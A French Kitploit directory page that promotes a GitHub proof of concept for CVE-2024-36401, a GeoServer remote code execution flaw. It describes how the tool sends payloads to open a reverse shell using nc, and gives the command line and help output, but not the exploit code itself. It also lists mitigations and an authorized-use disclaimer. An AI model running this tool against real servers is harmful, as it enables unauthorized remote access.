Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-36401 — POC for CVE-2024-36401. This POC will attempt to establish a reverse shell from the vlun targets. | Kitploit
Outils/GitHubGitHub/bigb0x/cve-2024-36401
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubbigb0x/cve-2024-36401

CVE-2024-36401

POC for CVE-2024-36401. This POC will attempt to establish a reverse shell from the vlun targets.

Voir le dépôt
3415il y a 2 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

RCE pour CVE-2024-36401

POC pour CVE-2024-36401 GeoServer. Ce POC tentera d'établir un reverse shell système depuis les cibles.

Banner

Aperçu

POC pour CVE-2024-36401 : RCE pour les versions de GeoServer antérieures à 2.25.1, 2.24.3 et 2.23.5. Ce POC est basé sur l'avis de sécurité de phith0n.

Comment ça fonctionne

  1. Configure un listener sur votre machine pour un reverse shell entrant depuis la cible.
  2. Ce POC enverra une requête POST avec les payloads.
  3. Tente d'établir un shell sur le serveur cible.
  4. Cette technique suppose que nc est installé sur la cible.

Comment utiliser

Ce POC tentera d'établir un reverse shell depuis les cibles vulnérables. Il est conçu pour fonctionner contre des cibles Linux vulnérables. Vous devez disposer d'une machine avec une IP publiée et accessible pour exécuter ce POC.

Prérequis minimaux

  • Python 3.6 ou version ultérieure
  • Bibliothèque requests

Pour utiliser ce POC contre une seule cible :

root@kitploit:~
python CVE-2024-36401.py -u HTTP://TARGET:9090 -ip YOUR-IP -port LOCAL-PORT-NUMBER -type GeoServer-Object-Type

Aide :

root@kitploit:~
python3 CVE-2024-36401.py  -h

options:
  -h, --help  show this help message and exit
  -u U        Target, example https://target:8080
  -ip IP      Your IP, example 192.168.1.1
  -port PORT  Port, example 1337
  -type TYPE  Type, example sf:archsites

Comment protéger votre appliance GeoServer

1- Désactivez les requêtes WFS.

2- Sécurisez votre Linux en configurant iptables pour désactiver les connexions inverses, définir des politiques par défaut pour bloquer tout le trafic, autoriser les connexions établies et associées, et n'autoriser que le trafic sortant essentiel comme DNS, HTTP et HTTPS.

3- Ou mettez à jour vers la dernière version de GeoServer.

Contact

Pour toute suggestion ou réflexion, veuillez me contacter moi.

Avertissement

J'aime créer mes propres outils pour le plaisir, le travail et à des fins éducatives uniquement. Je ne soutiens ni n'encourage le piratage ou l'accès non autorisé à un système ou réseau. Veuillez utiliser mes outils de manière responsable et uniquement sur des systèmes pour lesquels vous avez une autorisation claire de tester.

Télécharger l’outil